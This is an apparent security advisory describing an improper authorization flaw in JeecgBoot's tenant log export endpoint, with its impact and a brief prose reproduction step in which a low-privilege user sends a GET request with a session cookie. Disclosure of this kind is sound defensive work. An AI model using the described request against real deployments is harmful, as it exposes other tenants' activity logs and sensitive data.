JeecgBoot Improper Authorization Vulnerability in Tenant Log Export

A vulnerability allowing improper authorization has been identified in JeecgBoot versions through 3.8.2. The issue resides in the Tenant Log Export component, specifically within the file '/sys/tenant/exportLog'. This vulnerability allows authenticated users to access and download tenant operation logs, which may contain sensitive information. The flaw can be exploited remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows any authenticated user to download tenant operation logs, potentially leading to unauthorized access to sensitive information. This could include details about user activities, IP addresses, and other operational data, which could be used to plan further attacks. Additionally, the vulnerability could be exploited to evade security monitoring by understanding what actions are being logged, or to cause privacy violations by exposing user activity logs across different tenants.

Reproduction

To reproduce this vulnerability, an authenticated user with low privileges can send a GET request to the '/sys/tenant/exportLog' endpoint. The request must include the session cookie of the authenticated user. The absence of proper authorization checks on this endpoint allows the user to download logs that could contain sensitive information.